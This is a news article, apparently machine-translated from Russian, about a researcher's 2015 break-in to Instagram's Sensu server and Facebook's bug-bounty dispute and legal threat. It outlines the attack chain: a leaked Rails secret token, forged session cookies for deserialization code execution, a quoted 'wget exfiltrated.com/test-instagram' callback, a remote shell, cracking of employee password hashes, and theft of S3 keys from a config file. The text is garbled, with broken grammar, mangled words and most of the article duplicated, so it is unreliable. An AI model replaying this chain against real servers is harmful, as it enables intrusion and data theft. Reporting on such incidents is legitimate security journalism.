Facebook threatens the security professional, hack Instagram
Independent security specialist Wesley wineberg (Wineberg Wesley) has been subject to severe pressure from the company Facebook. She didn't pay for the found vulnerabilities on the server, Instagram, and even threatened a lawsuit.
/ > Wesley found in the Instagram infrastructure, which found (and possibly downloaded) almost all valuable thing on the Instagram servers: source code of the latest version, SSL certificates and private keys for Instagram.com the keys for the signature cookies of authentication credentials from the mail server and the keys for some other products, including the signature mobile app for iOS and Android.
Weinberg also received access employee accounts and their password hashes, some of which the hacker hacked and got access to several repositories (battam) Amazon S3 with custom photos and other private data that are suspect of violating the privacy of the users from Facebook.
This whole Saga began back in October with the fact that a colleague of Weinberg told him about an open web server,
Hacker suggested that the same vulnerability can be found in other code Instagram. He studied their repository on Github, but nothing was found. But found something better. In the file secret_token.rb on github was stitched Rails secret token. The article at the link above describes in detail how to use such a token not only to fabricate the session cookie, but also to initiate the deserialization of session cookies in Rails to directly launch the remote execution of code.
Wesley configured the local instance of the Rails and took advantage of the exploit, which lies on github: rails-3.2.10-remote-code-execution.mdto generate an object that will hide in a cookie.
The resulting object, he signed the secret key from the Sensu-Admin — and got cookies from the Sensu-Admin. To the delight of the Explorer, the server took the cookies launched deserialization, confirmed the signature and run the object hidden inside.
It was the command
Having the RCE is running, the hacker has launched a remote shell.
Having received full confirmation of the bug, October 21, 2015 Weinberg has reported two vulnerabilities in Facebook, hoping for a reward. In his blog, he recalls statue 2012, in Bloomberg, where the head of the security Department of Facebook talks about his rewards for the detected bugs and says: "If you find a bug for a million dollars, we will pay him."
To prove the seriousness of the bug, the researcher continued to examine the contents of the Instagram servers, including downloaded to a local Postgres database with information about the accounts 60 employees and passwords, bcrypt hashed. Such hashes is very difficult to find: the hacker on the computer brute force speed was only 250 attempts per second. Surprisingly, some passwords were so easy that a dictionary attack has the effect after a few minutes.
the
Moving away from the shock, the hacker chose one of the passwords and logged into the web interface.
After this he was sent to Facebook information about weak user accounts (22 October).
Expecting due reward from Facebook, a specialist examined the contents of the configuration file
Facebook responded quickly hid the Sensu server for firewall and 16 November was paid a fee of $2,500 for the first of three bugs. At the same time October 28, Weinberg received a letter in which he refused to pay the remuneration for the second and third bugs, because the vulnerability of weak user accounts "is beyond the scope of the reward program for vulnerability".
Of course, specialist a little offended. To just $2500 for the vulnerability remote code execution is almost insultingly low. He has published in his blog a description of hacking and several email messages with the Facebook security Department.
After that, the situation began to deteriorate. Director, security Facebook Alex Stamos called the Director of the company Synack, which Weinberg works under the contract. He said that there was unauthorized access to a database of employees Instagram and confidential information of users. This information should be immediately deleted. Stamos said he did not want to inform the lawyers about the incident, but, if necessary, the case against Weinberg to be launched.
In response to the message in the blog of the security expert Alex Stamos is also released a statement, where he called the actions of the hacker "unauthorized and unethical." He also suggested that Weinberg dissatisfied with low remuneration explains his behavior.
At the same time, the expert confirmed that he had deleted all data from server S3 to anyone they did not show. He added that integramouse hosting could remain other unpatched vulnerabilities. But it seems that a million dollars he never paid.
Article based on information from habrahabr.ru
/ > Wesley found in the Instagram infrastructure, which found (and possibly downloaded) almost all valuable thing on the Instagram servers: source code of the latest version, SSL certificates and private keys for Instagram.com the keys for the signature cookies of authentication credentials from the mail server and the keys for some other products, including the signature mobile app for iOS and Android.
Weinberg also received access employee accounts and their password hashes, some of which the hacker hacked and got access to several repositories (battam) Amazon S3 with custom photos and other private data that are suspect of violating the privacy of the users from Facebook.
This whole Saga began back in October with the fact that a colleague of Weinberg told him about an open web server,
sensu.instagram.com, which runs on an Amazon EC2 instance and twists a framework for monitoring the Sensu. About the bug with the open admin server in Facebook already announced, but a colleague hinted that noticed there is a bug with the remote reset a password in Ruby on Rails application (CVE-2013-3221) for more information, see methods of attack on Ruby on Rails.Hacker suggested that the same vulnerability can be found in other code Instagram. He studied their repository on Github, but nothing was found. But found something better. In the file secret_token.rb on github was stitched Rails secret token. The article at the link above describes in detail how to use such a token not only to fabricate the session cookie, but also to initiate the deserialization of session cookies in Rails to directly launch the remote execution of code.
Wesley configured the local instance of the Rails and took advantage of the exploit, which lies on github: rails-3.2.10-remote-code-execution.mdto generate an object that will hide in a cookie.
The resulting object, he signed the secret key from the Sensu-Admin — and got cookies from the Sensu-Admin. To the delight of the Explorer, the server took the cookies launched deserialization, confirmed the signature and run the object hidden inside.
It was the command
wget exfiltrated.com/test-instagram — the server sensu.instagram.com obediently turned to hacking the server, which clearly pointed to the fact that the exploit works.Having the RCE is running, the hacker has launched a remote shell.
Having received full confirmation of the bug, October 21, 2015 Weinberg has reported two vulnerabilities in Facebook, hoping for a reward. In his blog, he recalls statue 2012, in Bloomberg, where the head of the security Department of Facebook talks about his rewards for the detected bugs and says: "If you find a bug for a million dollars, we will pay him."
To prove the seriousness of the bug, the researcher continued to examine the contents of the Instagram servers, including downloaded to a local Postgres database with information about the accounts 60 employees and passwords, bcrypt hashed. Such hashes is very difficult to find: the hacker on the computer brute force speed was only 250 attempts per second. Surprisingly, some passwords were so easy that a dictionary attack has the effect after a few minutes.
the
-
the
- Six password "changeme" the
- Three password coincide with the user name the
- Single password "instagram"
Moving away from the shock, the hacker chose one of the passwords and logged into the web interface.
After this he was sent to Facebook information about weak user accounts (22 October).
Expecting due reward from Facebook, a specialist examined the contents of the configuration file
/etc/sensu/config.json, there were key pairs from 82 containers Amazon S3. Access was closed to all except one. But the only container he had found another key pair, which gave access to all the 82nd the rest of the containers.Facebook responded quickly hid the Sensu server for firewall and 16 November was paid a fee of $2,500 for the first of three bugs. At the same time October 28, Weinberg received a letter in which he refused to pay the remuneration for the second and third bugs, because the vulnerability of weak user accounts "is beyond the scope of the reward program for vulnerability".
Of course, specialist a little offended. To just $2500 for the vulnerability remote code execution is almost insultingly low. He has published in his blog a description of hacking and several email messages with the Facebook security Department.
After that, the situation began to deteriorate. Director, security Facebook Alex Stamos called the Director of the company Synack, which Weinberg works under the contract. He said that there was unauthorized access to a database of employees Instagram and confidential information of users. This information should be immediately deleted. Stamos said he did not want to inform the lawyers about the incident, but, if necessary, the case against Weinberg to be launched.
In response to the message in the blog of the security expert Alex Stamos is also released a statement, where he called the actions of the hacker "unauthorized and unethical." He also suggested that Weinberg dissatisfied with low remuneration explains his behavior.
At the same time, the expert confirmed that he had deleted all data from server S3 to anyone they did not show. He added that integramouse hosting could remain other unpatched vulnerabilities. But it seems that a million dollars he never paid.
Комментарии
Отправить комментарий